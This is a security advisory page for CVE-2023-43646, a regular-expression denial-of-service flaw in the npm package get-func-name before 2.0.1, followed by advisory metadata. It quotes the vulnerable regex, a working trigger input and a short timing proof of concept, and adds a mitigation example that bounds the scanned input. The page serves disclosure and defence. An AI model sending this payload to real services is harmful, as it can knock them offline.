Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS00cTZwLXI2djItanZjNc4AA2HC

Chaijs/get-func-name vulnerable to ReDoS

The current regex implementation for parsing values in the module is susceptible to excessive backtracking, leading to potential DoS attacks. The regex implementation in question is as follows:

const functionNameMatch = /\s*function(?:\s|\s*\/\*[^(?:*/)]+\*\/\s*)*([^\s(/]+)/;

This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input:

'\t'.repeat(54773) + '\t/function/i'

Here is a simple PoC code to demonstrate the issue:

// The module's regex, exactly as quoted above
const protocolre = /\s*function(?:\s|\s*\/\*[^(?:*/)]+\*\/\s*)*([^\s(/]+)/;

const startTime = Date.now();
// Many tabs followed by a token that begins like "function" but is not one
const maliciousInput = '\t'.repeat(54773) + '\t/function/i';

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

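As an added example (not code from the advisory or from the get-func-name project), here is the quoted regex beside a bounded-work variant and a small timer that shows the quadratic growth on the advisory's trigger shape; the 512-character cap and the function names are my own assumptions, not the project's 2.0.1 patch.

```javascript
// Constructed example, not code from the advisory or the get-func-name project.
// The regex is the one quoted in the advisory; the 512-character cap and the
// function names are my own assumptions, not the project's 2.0.1 patch.
const functionNameMatch = /\s*function(?:\s|\s*\/\*[^(?:*/)]+\*\/\s*)*([^\s(/]+)/;
const MAX_SOURCE_LENGTH = 512; // assumed cap; a real function's name sits near the start

// Vulnerable shape: the regex scans the whole source, however long it is.
function nameFromSourceUnbounded(source) {
  const m = functionNameMatch.exec(source);
  return m ? m[1] : '';
}

// Mitigated shape: only a fixed-length prefix is scanned, so the worst case is
// a constant no matter how long the caller's input is.
function nameFromSourceBounded(source, cap = MAX_SOURCE_LENGTH) {
  const m = functionNameMatch.exec(source.slice(0, cap));
  return m ? m[1] : '';
}

// The advisory's trigger shape: n tabs, then a token that begins like
// "function" but is not one, so the leading \s* backtracks at every offset.
function triggerInput(n) {
  return '\t'.repeat(n) + '\t/function/i';
}

// Wall-clock milliseconds for one call of fn(arg).
function timeMs(fn, arg) {
  const t0 = process.hrtime.bigint();
  fn(arg);
  return Number(process.hrtime.bigint() - t0) / 1e6;
}

// Demo on small, constructed inputs: doubling n roughly quadruples the
// unbounded time, while the bounded time stays flat.
for (const n of [1000, 2000, 4000]) {
  const input = triggerInput(n);
  console.log(`n=${n}: unbounded ${timeMs(nameFromSourceUnbounded, input).toFixed(2)} ms, ` +
    `bounded ${timeMs(nameFromSourceBounded, input).toFixed(3)} ms`);
}
```

The bounded variant returns the same name as the original for ordinary function sources and simply returns an empty string for the advisory's input without the multi-second stall.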
Permalink: https://github.com/advisories/GHSA-4q6p-r6v2-jvc5
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cTZwLXI2djItanZjNc4AA2HC
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 year ago
Updated: about 1 year ago

CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS Percentage: 0.00081
EPSS Percentile: 0.35721

Identifiers: GHSA-4q6p-r6v2-jvc5, CVE-2023-43646
References: Repository: https://github.com/chaijs/get-func-name
Blast Radius: 41.3

Affected Packages

npm:get-func-name
Dependent packages: 279
Dependent repositories: 325,251
Downloads: 50,061,370 last month
Affected Version Ranges: < 2.0.1
Fixed in: 2.0.1
All affected versions: 1.0.0, 2.0.0
All unaffected versions: 2.0.1, 2.0.2, 3.0.0